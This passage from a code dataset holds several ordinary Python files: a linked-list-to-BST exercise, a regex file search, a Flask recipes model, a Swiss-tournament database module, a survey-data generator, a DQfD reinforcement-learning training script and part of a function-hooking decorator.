None: return head\n length = 0\n liter = head\n while liter != None:\n length += 1\n liter = liter.next\n if length == 1: return TreeNode(head.val)\n lefthead, righthead = head, None\n mid = head\n prev = None\n for i in xrange(length/2):\n prev = mid\n mid = mid.next\n righthead = mid.next\n prev.next = None\n node = TreeNode(mid.val)\n node.left = self.sortedListToBST(lefthead)\n node.right = self.sortedListToBST(righthead)\n return node\n\nif __name__ == '__main__':\n n = input('Please enter the number of elements in the sorted list: ')\n sentinel = ListNode(-1)\n for i in xrange(n):\n ele = input('Please enter the value of the element: ')\n node = ListNode(ele)\n node.next = sentinel.next\n sentinel.next = node\n solution = Solution()\n root = solution.sortedListToBST(sentinel.next)\n def printTree(head):\n if head == None: return \n printTree(head.left)\n pprint('current value: %d' % head.val)\n printTree(head.right)\n printTree(root)","sub_path":"listbst.py","file_name":"listbst.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"200253096","text":"# regex_search.py - Regex Search all .txt files in cwd\n\n\"\"\"\nWrite a program that opens all .txt files in a folder and searches for any \nline that matches a user-supplied regular expression. 
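The map/shuffle/reduce pipeline above builds a word_id -> {doc_id: count} inverted index; on a toy token stream the whole structure fits in a few lines (illustrative only, without the three-way partitioning):

    from collections import defaultdict

    tokens = [(0, 0), (1, 0), (0, 1), (2, 1), (0, 1)]   # (word_id, doc_id)

    index = defaultdict(lambda: defaultdict(int))
    for word_id, doc_id in tokens:
        index[word_id][doc_id] += 1

    assert dict(index[0]) == {0: 1, 1: 2}   # word 0: once in doc 0, twice in doc 1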
The results should \nbe printed to the screen.\n\"\"\"\n\nimport os, re\n\ncurrent_dir = os.getcwd() + \"\\\\\"\n\nlist_of_items = os.listdir(current_dir)\nnumber_of_text_files = 0\n\nfor file in list_of_items:\n if file.endswith(\".txt\") and os.path.isfile(current_dir + file):\n number_of_text_files += 1\n\nif number_of_text_files == 0:\n print(\"No text files found in current directory.\")\nelse:\n print(\"Enter a regular expression:\")\n user_regex = input()\n regex = re.compile(user_regex)\n for file in list_of_items:\n if file.endswith(\".txt\") and os.path.isfile(current_dir + file):\n current_file = open(current_dir + file)\n current_file_contents = current_file.read()\n regex_match = re.findall(regex, current_file_contents)\n if len(regex_match) > 0:\n print(\n file\n + \": \"\n + str(len(regex_match))\n + ' occurences matching \"'\n + user_regex\n + '\"'\n )\n\n","sub_path":"FileManipulation/RegexSearch/regex_search.py","file_name":"regex_search.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39773932","text":"from flask_app.config.MySQLConnection import connectToMySQL\nfrom flask import flash\nfrom flask_app.models import users\n\n\n\nclass Recipes:\n def __init__(self, data):\n self.id = data[\"id\"]\n self.dish_name = data[\"dish_name\"]\n self.dish_description = data[\"dish_description\"]\n self.dish_time = data[\"dish_time\"]\n self.dish_instructions = data[\"dish_instructions\"]\n self.user_id = data[\"user_id\"]\n self.created_at = data[\"created_at\"]\n self.updated_at = data[\"updated_at\"]\n\n self.owner = {}\n\n @staticmethod\n def verify_recipes(my_recipes):\n is_valid = True\n\n if len(my_recipes['dish_name']) < 3:\n flash(\"Title must be at least 3 characters long!\")\n is_valid = False\n\n if len(my_recipes['dish_description']) < 3:\n flash(\"Description must be at least 3 characters long!\")\n is_valid = False\n\n if len(my_recipes['dish_instructions']) < 3:\n flash(\"Description must be at least 3 characters long!\")\n is_valid = False\n\n return is_valid\n\n @classmethod\n def insert_recipe(cls, data):\n query = \"INSERT INTO recipes (dish_name, dish_description, dish_time, dish_instructions, user_id, created_at, updated_at) VALUES (%(dish_name)s, %(dish_description)s, %(dish_time)s, %(dish_instructions)s, %(user_id)s, NOW(), NOW());\"\n results = connectToMySQL(\"recipes_schema\").query_db(query, data)\n return results\n\n @classmethod\n def users_with_recipes(cls):\n query = \"SELECT * FROM recipes LEFT JOIN users ON recipes.user_id = users.id;\"\n results = connectToMySQL(\"recipes_schema\").query_db(query)\n\n all_recipes = []\n\n for row in results:\n one_recipe = cls(row)\n user_data = {\n \"id\" : row['users.id'],\n \"first_name\" : row['first_name'],\n \"last_name\" : row['last_name'],\n \"email\" : row['email'],\n \"password\" : row['password'],\n \"created_at\" : row['users.created_at'],\n \"updated_at\" : row['users.updated_at'],\n }\n one_recipe.owner = users.Users(user_data)\n all_recipes.append(one_recipe)\n return all_recipes\n\n @classmethod\n def one_user_one_recipe(cls, data):\n query = \"SELECT * FROM recipes LEFT JOIN users ON recipes.user_id = users.id WHERE recipes.id = %(recipe_id)s;\"\n results = connectToMySQL(\"recipes_schema\").query_db(query, data)\n\n one_recipe = cls(results[0])\n\n user_data = {\n \"id\" : results[0]['users.id'],\n \"first_name\" : results[0]['first_name'],\n \"last_name\" : results[0]['last_name'],\n \"email\" : 
results[0]['email'],\n \"password\" : results[0]['password'],\n \"created_at\" : results[0]['users.created_at'],\n \"updated_at\" : results[0]['users.updated_at'],\n }\n\n one_recipe.owner = users.Users(user_data)\n return one_recipe\n\n @classmethod\n def update_recipe(cls, data):\n query = \"UPDATE recipes SET dish_name = %(dish_name)s, dish_description = %(dish_description)s, dish_time = %(dish_time)s, dish_instructions = %(dish_instructions)s, updated_at = NOW() WHERE id = %(recipe_id)s;\"\n results = connectToMySQL(\"recipes_schema\").query_db(query, data)\n return \n \n @classmethod\n def delete_recipe(cls, data):\n query = \"DELETE FROM recipes WHERE id=%(recipe_id)s;\"\n results = connectToMySQL(\"recipes_schema\").query_db(query, data)\n return","sub_path":"flask_app/models/recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"205453178","text":"#!/usr/bin/env python\n# \n# tournament.py -- implementation of a Swiss-system tournament\n#\n\nimport psycopg2\n\n\ndef connect():\n \"\"\"Connect to the PostgreSQL database. Returns a database connection.\"\"\"\n return psycopg2.connect(\"dbname=tournament\")\n\ndef deleteMatches():\n \"\"\"Remove all the match records from the database.\"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'UPDATE standings SET wins = 0, matches = 0')\n db.commit()\n db.close()\n\ndef deletePlayers():\n \"\"\"Remove all the player records from the database.\"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'DELETE FROM standings *')\n cursor.execute( 'DELETE FROM players *')\n db.commit()\n db.close()\n\ndef countPlayers():\n \"\"\"Returns the number of players currently registered.\"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'SELECT count(*) FROM players')\n count = cursor.fetchone()[0]\n db.close()\n return count\n\n\ndef registerPlayer(name):\n \"\"\"Adds a player to the tournament database.\n \n The database assigns a unique serial id number for the player. 
(This\n should be handled by your SQL database schema, not in your Python code.)\n \n Args:\n name: the player's full name (need not be unique).\n \"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'INSERT INTO players (name) '\n 'VALUES(%s)', (name,))\n cursor.execute( 'INSERT INTO standings (id_num) '\n 'SELECT players.id_num '\n 'FROM players '\n 'WHERE players.name = (%s)', (name,))\n db.commit()\n db.close()\n \ndef playerStandings():\n \"\"\"Returns a list of the players and their win records, sorted by wins.\n\n The first entry in the list should be the player in first place, or a player\n tied for first place if there is currently a tie.\n\n Returns:\n A list of tuples, each of which contains (id, name, wins, matches):\n id: the player's unique id (assigned by the database)\n name: the player's full name (as registered)\n wins: the number of matches the player has won\n matches: the number of matches the player has played\n \"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'SELECT * FROM swissPairings')\n standings = cursor.fetchall()\n db.close()\n return standings\n\ndef reportMatch(winner, loser):\n \"\"\"Records the outcome of a single match between two players.\n\n Args:\n winner: the id number of the player who won\n loser: the id number of the player who lost\n \"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'UPDATE standings '\n 'SET wins = wins + 1, '\n 'matches = matches + 1 '\n 'WHERE id_num = (%s)', (winner,))\n cursor.execute( 'UPDATE standings '\n 'SET matches = matches + 1 '\n 'WHERE id_num = (%s)', (loser,))\n db.commit()\n db.close()\n \ndef swissPairings():\n \"\"\"Returns a list of pairs of players for the next round of a match.\n \n Assuming that there are an even number of players registered, each player\n appears exactly once in the pairings. 
Each player is paired with another\n player with an equal or nearly-equal win record, that is, a player adjacent\n to him or her in the standings.\n \n Returns:\n A list of tuples, each of which contains (id1, name1, id2, name2)\n id1: the first player's unique id\n name1: the first player's name\n id2: the second player's unique id\n name2: the second player's name\n \"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'SELECT a.id_num, a.name, b.id_num, b.name '\n 'FROM swissPairings AS a, swissPairings AS b '\n 'WHERE a.wins = b.wins '\n 'AND a.id_num > b.id_num')\n swissPairings = cursor.fetchall()\n db.close()\n return swissPairings\n","sub_path":"tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"577303864","text":"\"\"\"Provide a Very naive utility to simulate random chunks of survey data.\"\"\"\n\nimport gzip\n# import itertools\nimport json\nimport os\nimport random\nimport sys\nimport uuid\n\nimport constants\n\n\ndef main():\n \"\"\"Start the ball rolling.\"\"\"\n os.makedirs(\"../json-data\", exist_ok=True)\n # num_docs = 1005\n num_docs = int(sys.argv[1])\n for answerno in range(num_docs):\n print('Creating document', answerno, 'of', num_docs)\n basename = \"../json-data/chunck_%s\" % uuid.uuid4()\n tempname = basename + '.temp.gz'\n longtermname = basename + '.json.gz'\n\n # We compress with gzip.\n # It's relatively fast compression.\n # We could compress with bzip2 or zlib instead if we have the CPU time available.\n # We could do bits and bytes, but that's harder to debug, and only worth it if there's a LOT of data to store.\n # We could eliminate all unanswered responses, but that is a little prone to surprises.\n # We also have the option of using bson instead of json.\n with gzip.open(tempname, \"w\") as answerfile:\n row = {\"pk\": \"%d\" % answerno}\n for carvar in constants.carvars:\n row[carvar] = random.choice(constants.carbrands)\n for carvar in constants.mrcarvars:\n for carbrand in constants.carbrands:\n row[\"%s.%s\" % (carvar, carbrand)] = random.choice(constants.answers)\n for singvar in constants.singervars:\n row[singvar] = random.choice(constants.singers)\n for singvar in constants.mrsingervars:\n for singer in constants.singers:\n row[\"%s.%s\" % (singvar, singer)] = random.choice(constants.answers)\n string = json.dumps(row)\n answerfile.write(string.encode('UTF-8'))\n os.rename(tempname, longtermname)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"data/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"283153880","text":"\"\"\"An example of training DQfD for OpenAI gym Environments.\r\n\"\"\"\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\nfrom __future__ import unicode_literals\r\n\r\nimport argparse\r\nimport os\r\nfrom builtins import * # NOQA\r\n\r\nimport chainer\r\nimport chainer.functions as F\r\n\r\nimport chainerrl\r\n\r\nfrom chainerrl import experiments\r\nfrom chainerrl.agents.dqfd import DQfD, PrioritizedDemoReplayBuffer\r\n\r\nfrom future import standard_library\r\nstandard_library.install_aliases() # NOQA\r\n\r\nimport gym\r\n\r\nimport numpy as np\r\n\r\n\r\ndef main():\r\n \"\"\"Parses arguments and runs the example\r\n \"\"\"\r\n\r\n parser = 
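The swissPairings self-join above matches players with equal win counts; the same idea on an in-memory standings list, pairing adjacent entries of a wins-sorted (id, name, wins, matches) table (names and ids invented):

    standings = [(3, "Ada", 2, 2), (7, "Grace", 2, 2), (1, "Alan", 1, 2), (4, "Edsger", 1, 2)]
    pairings = [(a[0], a[1], b[0], b[1])
                for a, b in zip(standings[::2], standings[1::2])]
    assert pairings == [(3, "Ada", 7, "Grace"), (1, "Alan", 4, "Edsger")]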
argparse.ArgumentParser()\r\n parser.add_argument('--env', type=str, default='CartPole-v1',\r\n help='Gym environment to run the example on')\r\n parser.add_argument('--outdir', type=str, default='results',\r\n help='Directory path to save output files.'\r\n ' If it does not exist, it will be created.')\r\n parser.add_argument('--seed', type=int, default=0)\r\n parser.add_argument('--gpu', type=int, default=-1,\r\n help='GPU to use, set to -1 if no GPU.')\r\n parser.add_argument('--final-exploration-frames',\r\n type=int, default=4000,\r\n help='Timesteps after which we stop ' +\r\n 'annealing exploration rate')\r\n parser.add_argument('--final-epsilon', type=float, default=0.02,\r\n help='Final value of epsilon during training.')\r\n parser.add_argument('--eval-epsilon', type=float, default=0.01,\r\n help='Exploration epsilon used during eval episodes.')\r\n parser.add_argument('--steps', type=int, default=15000,\r\n help='Total number of timesteps to train the agent.')\r\n parser.add_argument('--replay-start-size', type=int, default=1000,\r\n help='Minimum replay buffer size before ' +\r\n 'performing gradient updates.')\r\n parser.add_argument('--target-update-interval', type=int, default=200,\r\n help='Frequency (in timesteps) at which ' +\r\n 'the target network is updated.')\r\n parser.add_argument('--eval-interval', type=int, default=100,\r\n help='Frequency (in timesteps) of evaluation phase.')\r\n parser.add_argument('--update-interval', type=int, default=1,\r\n help='Frequency (in timesteps) of network updates.')\r\n parser.add_argument('--eval-n-runs', type=int, default=10)\r\n parser.add_argument('--no-clip-delta',\r\n dest='clip_delta', action='store_false')\r\n parser.add_argument('--num-step-return', type=int, default=3)\r\n parser.set_defaults(clip_delta=True)\r\n parser.add_argument('--logging-level', type=int, default=20,\r\n help='Logging level. 
10:DEBUG, 20:INFO etc.')\r\n parser.add_argument('--render-train', action='store_true')\r\n parser.add_argument('--render-eval', action='store_true')\r\n parser.add_argument('--monitor', action='store_true')\r\n parser.add_argument('--lr', type=float, default=5e-4, help='Learning rate')\r\n parser.add_argument(\"--replay-buffer-size\", type=int, default=50000,\r\n help=\"Size of replay buffer (w/o demonstrations)\")\r\n parser.add_argument(\"--minibatch-size\", type=int, default=32)\r\n parser.add_argument('--demo', action='store_true', default=False)\r\n parser.add_argument('--load', type=str, default=None)\r\n parser.add_argument(\"--save-demo-trajectories\", action=\"store_true\",\r\n default=False)\r\n parser.add_argument('--reward-scale-factor', type=float, default=1.0)\r\n parser.add_argument(\"--n-hidden-channels\", type=int, default=64)\r\n parser.add_argument(\"--n-hidden-layers\", type=int, default=2)\r\n\r\n # DQfD specific parameters for loading and pretraining.\r\n parser.add_argument('--expert-demo-path', type=str, default=None)\r\n parser.add_argument('--n-pretrain-steps', type=int, default=1500)\r\n parser.add_argument('--demo-supervised-margin', type=float, default=0.8)\r\n parser.add_argument('--loss-coeff-l2', type=float, default=1e-5)\r\n parser.add_argument('--loss-coeff-nstep', type=float, default=1.0)\r\n parser.add_argument('--loss-coeff-supervised', type=float, default=1.0)\r\n parser.add_argument('--bonus-priority-agent', type=float, default=0.001)\r\n parser.add_argument('--bonus-priority-demo', type=float, default=1.0)\r\n parser.add_argument('--priority-error-max', type=float, default=2.0)\r\n args = parser.parse_args()\r\n\r\n assert args.expert_demo_path is not None, \"DQfD needs collected \\\r\n expert demonstrations\"\r\n\r\n import logging\r\n logging.basicConfig(level=args.logging_level)\r\n\r\n train_seed = args.seed\r\n test_seed = 2 ** 31 - 1 - args.seed\r\n\r\n chainerrl.misc.set_random_seed(args.seed, gpus=(args.gpu,))\r\n\r\n args.outdir = chainerrl.experiments.prepare_output_dir(\r\n args, args.outdir)\r\n print('Output files are saved in {}'.format(args.outdir))\r\n\r\n def make_env(test):\r\n \"\"\"Makes and seeds the environment\r\n \"\"\"\r\n env = gym.make(args.env)\r\n\r\n env_seed = test_seed if test else train_seed\r\n env.seed(env_seed)\r\n\r\n # Cast observations to float32 because our model uses float32\r\n # env = chainerrl.wrappers.CastObservationToFloat32(env)\r\n # if args.monitor:\r\n # env = gym.wrappers.Monitor(env, args.outdir)\r\n # if not test:\r\n # Scale rewards (and thus returns) to a reasonable range so that\r\n # training is easier\r\n # env = chainerrl.wrappers.ScaleReward(env, args.reward_scale_factor)\r\n # if ((args.render_eval and test) or\r\n # (args.render_train and not test)):\r\n # env = chainerrl.wrappers.Render(env)\r\n return env\r\n\r\n env = make_env(test=False)\r\n eval_env = make_env(test=True)\r\n\r\n q_func = chainerrl.q_functions.FCStateQFunctionWithDiscreteAction(\r\n ndim_obs=env.observation_space.low.size,\r\n n_actions=env.action_space.n,\r\n n_hidden_channels=args.n_hidden_channels,\r\n n_hidden_layers=args.n_hidden_layers,\r\n nonlinearity=F.relu)\r\n\r\n explorer = chainerrl.explorers.LinearDecayEpsilonGreedy(\r\n 1.0, args.final_epsilon,\r\n args.final_exploration_frames,\r\n lambda: np.random.randint(env.action_space.n))\r\n\r\n # Draw the computational graph and save it in the output directory.\r\n chainerrl.misc.draw_computational_graph(\r\n [q_func(env.observation_space.sample()[None])],\r\n 
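LinearDecayEpsilonGreedy above anneals epsilon linearly from 1.0 to --final-epsilon over --final-exploration-frames; a standalone sketch of that schedule using the defaults above (the clamping detail is an assumption about the library's behaviour):

    def epsilon(t, start=1.0, final=0.02, frames=4000):
        return max(final, start + (final - start) * t / frames)

    assert epsilon(0) == 1.0
    assert abs(epsilon(2000) - 0.51) < 1e-9   # halfway through the anneal
    assert epsilon(10000) == 0.02             # held constant after the anneal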
os.path.join(args.outdir, 'model'))\r\n\r\n opt = chainer.optimizers.Adam(args.lr)\r\n opt.setup(q_func)\r\n betasteps = args.steps / args.update_interval\r\n replay_buffer = PrioritizedDemoReplayBuffer(\r\n args.replay_buffer_size, alpha=0.6,\r\n beta0=0.4, betasteps=betasteps, error_max=args.priority_error_max,\r\n num_steps=args.num_step_return)\r\n\r\n # Fill the demo buffer with expert transitions\r\n n_demo_transitions = 0\r\n with chainer.datasets.open_pickle_dataset(args.expert_demo_path) as dset:\r\n for transition in dset:\r\n (obs, a, r, new_obs, done, info) = transition\r\n n_demo_transitions += 1\r\n replay_buffer.append(state=obs,\r\n action=a,\r\n reward=r,\r\n next_state=new_obs,\r\n next_action=None,\r\n is_state_terminal=done,\r\n demo=True)\r\n if (\"needs_reset\" in info and info[\"needs_reset\"]):\r\n replay_buffer.stop_current_episode(demo=True)\r\n print(\"Demo buffer loaded with %d (1 and n-step) transitions from \"\r\n \"%d expert demonstration transitions\" % (len(replay_buffer),\r\n n_demo_transitions))\r\n\r\n def phi(x):\r\n # Feature extractor\r\n return np.asarray(x, dtype=np.float32)\r\n\r\n agent = DQfD(q_func, opt, replay_buffer,\r\n gamma=0.99,\r\n explorer=explorer,\r\n n_pretrain_steps=args.n_pretrain_steps,\r\n demo_supervised_margin=args.demo_supervised_margin,\r\n bonus_priority_agent=args.bonus_priority_agent,\r\n bonus_priority_demo=args.bonus_priority_demo,\r\n loss_coeff_nstep=args.loss_coeff_nstep,\r\n loss_coeff_supervised=args.loss_coeff_supervised,\r\n loss_coeff_l2=args.loss_coeff_l2,\r\n gpu=args.gpu,\r\n replay_start_size=args.replay_start_size,\r\n target_update_interval=args.target_update_interval,\r\n clip_delta=args.clip_delta,\r\n update_interval=args.update_interval,\r\n batch_accumulator='sum',\r\n phi=phi, minibatch_size=args.minibatch_size)\r\n\r\n if args.load:\r\n agent.load(args.load)\r\n\r\n if args.demo:\r\n eval_stats = experiments.eval_performance(\r\n env=eval_env,\r\n agent=agent,\r\n n_steps=None,\r\n n_episodes=args.eval_n_runs)\r\n print('n_runs: {} mean: {} median: {} stdev {}'.format(\r\n args.eval_n_runs, eval_stats['mean'], eval_stats['median'],\r\n eval_stats['stdev']))\r\n else:\r\n logger = logging.getLogger(__name__)\r\n evaluator = experiments.Evaluator(agent=agent,\r\n n_steps=None,\r\n n_episodes=args.eval_n_runs,\r\n eval_interval=args.eval_interval,\r\n outdir=args.outdir,\r\n max_episode_len=None,\r\n env=eval_env,\r\n step_offset=0,\r\n save_best_so_far_agent=True,\r\n logger=logger)\r\n\r\n # Evaluate the agent BEFORE training begins\r\n evaluator.evaluate_and_update_max_score(t=0, episodes=0)\r\n experiments.train_agent(agent=agent,\r\n env=env,\r\n steps=args.steps,\r\n outdir=args.outdir,\r\n max_episode_len=None,\r\n step_offset=0,\r\n evaluator=evaluator,\r\n successful_score=None,\r\n step_hooks=[])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"general/chainerrl/chainerrl/examples/gym/train_dqfd_gym.py","file_name":"train_dqfd_gym.py","file_ext":"py","file_size_in_byte":10799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"435604411","text":"\n\nfrom xai.brain.wordbase.nouns._container import _CONTAINER\n\n#calss header\nclass _CONTAINERS(_CONTAINER, ):\n\tdef __init__(self,): \n\t\t_CONTAINER.__init__(self)\n\t\tself.name = \"CONTAINERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"container\"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/nouns/_containers.py","file_name":"_containers.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"233971209","text":"#\nimport collections\nimport copy\nimport inspect\nimport os\nimport ShareYourSystem as SYS\nimport sys\n#\n\n#\nHookingBeforeString='Before'\nHookingAfterString='After'\n#\n\n#\ndef getSettedHookedListWithInstanceVariable(_HookedList,_InstanceVariable):\n\n\t#Debug\n\t'''\n\tprint('HookedList is '+str(_HookedList))\n\tprint('')\n\t'''\n\n\t#Set first the class \n\tif _HookedList[0]==\"\":\n\t\t_HookedList[0]=_InstanceVariable.__class__\n\telif _HookedList[0]==\"\":\t\n\t\t_HookedList[0]=_InstanceVariable.__class__.__bases__[0]\n\telif type(_HookedList[0])==str:\n\t\t_HookedList[0]=getattr(\n\t\t\t\t\t\t\t\tSYS,\n\t\t\t\t\t\t\t\tSYS.getClassStringWithTypeString(_HookedList[0])\n\t\t\t\t\t\t\t\t)\n\n\t#Set then the method\n\tif type(_HookedList[1])==str and hasattr(_HookedList[0],_HookedList[1]):\n\t\t_HookedList[1]=getattr(_HookedList[0],_HookedList[1])\n\n\t#Return the list\n\treturn _HookedList\n\n\n#\n\n#\nclass HookerClass(SYS.DoerClass):\n\tdef __init__(self,**_VariablesDict):\n\n\t\t#Call the parent init method\n\t\tSYS.DoerClass.__init__(self)\n\n\t\t#\n\t\tself.HookingFunction=None\n\t\tself.HookingBeforeTuplesList=[]\n\t\tself.HookingAfterTuplesList=[]\n\t\tself.HookedBeforeTuplesList=[]\n\t\tself.HookedAfterTuplesList=[]\n\t\tself.HookingUniqueBool=True\n\t\tself.HookedFunctionString=\"\"\n\t\tself.HookedBeforeFunctionsList=[]\n\t\tself.HookedAfterFunctionsList=[]\n\t\tself.HookedFunction=None\n\t\tself.HookedClass=None\n\t\tself.HookedIsBool=False\n\t\t#\n\n\t\t#Update with the Kwargs\n\t\tmap(\n\t\t\t\tlambda __ItemTuple:\n\t\t\t\tself.__setattr__('Hooking'+__ItemTuple[0],__ItemTuple[1]),\n\t\t\t\t_VariablesDict.iteritems()\n\t\t\t)\n\n\tdef __call__(self,_HookingFunction):\n\n\t\t#Hook\n\t\tself.hook(_HookingFunction)\n\n\t\t#Return the HookedFunction\n\t\treturn self.HookedFunction\n\n\tdef hook(self,_HookingFunction):\n\n\t\t#Set the HookedFunction\n\t\tself.HookingFunction=_HookingFunction\t\n\n\t\t#Set the HookedFunctionString\n\t\tself.HookedFunctionString=_HookingFunction.__name__\n\n\t\t#Define the WrappedFunction\n\t\tdef HookedFunction(*_VariablesList,**_VariablesDict):\n\n\t\t\t#Debug\n\t\t\t'''\n\t\t\tprint('Debugger l.88 : Start of the method')\n\t\t\tprint('')\n\t\t\t'''\n\n\t\t\t#Define an alias of the instance\n\t\t\tInstanceVariable=_VariablesList[0]\n\n\t\t\t#Init maybe the _VariablesDict\n\t\t\tif 'HookingIsBool' not in _VariablesDict:\n\t\t\t\t_VariablesDict['HookingIsBool']=True\n\t\t\t\t_VariablesDict['HookedFunctionsList']=[]\n\t\t\t\t_VariablesDict['HookingUniqueBool']=self.HookingUniqueBool\n\n\t\t\t#Init maybe the hooking classes and functions for the first call\n\t\t\tif self.HookedIsBool==False:\n\n\t\t\t\t#Set to the HookerPointer the corresponding class\n\t\t\t\tself.HookedClass=InstanceVariable.__class__\n\n\t\t\t\t#Set the name\n\t\t\t\tself.__class__.__name__=self.HookedClass.__name__\n\n\t\t\t\t#Debug\n\t\t\t\t'''\n\t\t\t\tprint('We have to first set in the class the hooking classes and corresponding functions')\n\t\t\t\tprint(str(self.HookingFunction))\n\t\t\t\tprint(str([self.HookingBeforeTuplesList,self.HookingAfterTuplesList]))\n\t\t\t\tprint('')\n\t\t\t\t'''\n\n\t\t\t\t#Set the 
self.HookedBeforeClass,self.HookedAfterClass\n\t\t\t\t[self.HookedBeforeTuplesList,self.HookedAfterTuplesList]=map(\n\t\t\t\t\tlambda __HookingTuplesList:\n\t\t\t\t\tmap(\n\t\t\t\t\t\t\tlambda __HookedList:\n\t\t\t\t\t\t\tgetSettedHookedListWithInstanceVariable(__HookedList,InstanceVariable),\n\t\t\t\t\t\t\tmap(list,__HookingTuplesList)\n\t\t\t\t\t),\n\t\t\t\t\t[self.HookingBeforeTuplesList,self.HookingAfterTuplesList]\n\t\t\t\t)\n\n\t\t\t\t#Set the hooking functions\n\t\t\t\t[self.HookedBeforeFunctionsList,self.HookedAfterFunctionsList]=map(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tlambda __HookedTuplesList:\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tSYS.unzip(__HookedTuplesList,[1]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t[self.HookedBeforeTuplesList,self.HookedAfterTuplesList]\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t)\n\n\t\t\t\t#Set the hooking functions\n\t\t\t\t[self.HookedBeforeStringsList,self.HookedAfterStringsList]=map(\n\t\t\t\t\t\t\t\t\t\t\t\t\tlambda __HookedBeforeFunctionsList:\n\t\t\t\t\t\t\t\t\t\t\t\t\tmap(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tlambda __HookedBeforeFunction:\n\t\t\t\t\t\t\t\t__HookedBeforeFunction.im_func.__repr__() \n\t\t\t\t\t\t\t\tif hasattr(__HookedBeforeFunction,'im_func')\n\t\t\t\t\t\t\t\telse __HookedBeforeFunction.__repr__()\n\t\t\t\t\t\t\t\t\t\t\t\t\t,__HookedBeforeFunctionsList\n\t\t\t\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t\t\t\t\t[self.HookedBeforeFunctionsList,self.HookedAfterFunctionsList]\n\t\t\t\t\t\t\t\t\t\t\t\t\t)\n\n\t\t\t\t#Debug\n\t\t\t\t'''\n\t\t\t\tprint('Hooker l.158 : hooked functions are setted and they are : ')\n\t\t\t\tprint(str([self.HookedBeforeStringsList,self.HookedAfterStringsList]))\n\t\t\t\tprint('')\n\t\t\t\t'''\n\n\t\t\t\t#Say ok for the setting\n\t\t\t\tself.HookedIsBool=True\n\n\t\t\t#After hooks (integrativ loop)\n\t\t\tfor __HookedAfterFunction in self.HookedAfterFunctionsList:\n\n\t\t\t\t#Check\n\t\t\t\tif _VariablesDict['HookingIsBool']:\n\t\n\t\t\t\t\t#Check\n\t\t\t\t\tif callable(__HookedAfterFunction):\n\t\t\t\t\t\n\t\t\t\t\t\t#Check if it is a unique call or not\n\t\t\t\t\t\tIsCalledBool=True\n\t\t\t\t\t\tif _VariablesDict['HookingUniqueBool']:\n\t\t\t\t\t\t\tif __HookedAfterFunction in _VariablesDict['HookedFunctionsList']:\n\t\t\t\t\t\t\t\tIsCalledBool=False\n\n\t\t\t\t\t\t#Append \n\t\t\t\t\t\t_VariablesDict['HookedFunctionsList'].append(__HookedAfterFunction)\n\n\t\t\t\t\t\t#Check for calling\n\t\t\t\t\t\tif IsCalledBool:\n\n\t\t\t\t\t\t\t#Debug\n\t\t\t\t\t\t\t'''\n\t\t\t\t\t\t\tprint('__HookedAfterFunction is called '+str(\n\t\t\t\t\t\t\t\t\t\t\t\t__HookedAfterFunction))\n\t\t\t\t\t\t\tprint('From Module '+str(inspect.getmodule(__HookedAfterFunction)))\n\t\t\t\t\t\t\tprint('')\n\t\t\t\t\t\t\t'''\n\n\t\t\t\t\t\t\t#Call\n\t\t\t\t\t\t\tOutputVariable=__HookedAfterFunction(*_VariablesList,**_VariablesDict)\n\n\t\t\t\t\t\t\t#Update maybe the _VariablesDict\n\t\t\t\t\t\t\tif type(OutputVariable)==dict:\n\t\t\t\t\t\t\t\t_VariablesDict.update(OutputVariable)\n\n\t\t\t\telse:\n\n\t\t\t\t\t#Return the instance\n\t\t\t\t\treturn InstanceVariable\n\n\t\t\t#Debug\n\t\t\t#print('_HookedFunction is '+str(_HookedFunction))\n\n\t\t\t#Check if it is a unique call or not\n\t\t\tIsCalledBool=True\n\t\t\tif _VariablesDict['HookingUniqueBool']:\n\t\t\t\tif self.HookingFunction in _VariablesDict['HookedFunctionsList']:\n\t\t\t\t\tIsCalledBool=False\n\n\t\t\t#Append \n\t\t\t_VariablesDict['HookedFunctionsList'].append(self.HookingFunction)\n\n\t\t\tif _VariablesDict['HookingIsBool']:\n\n\t\t\t\t#Debug\n\t\t\t\t'''\n\t\t\t\tprint('self.HookingFunction is called 
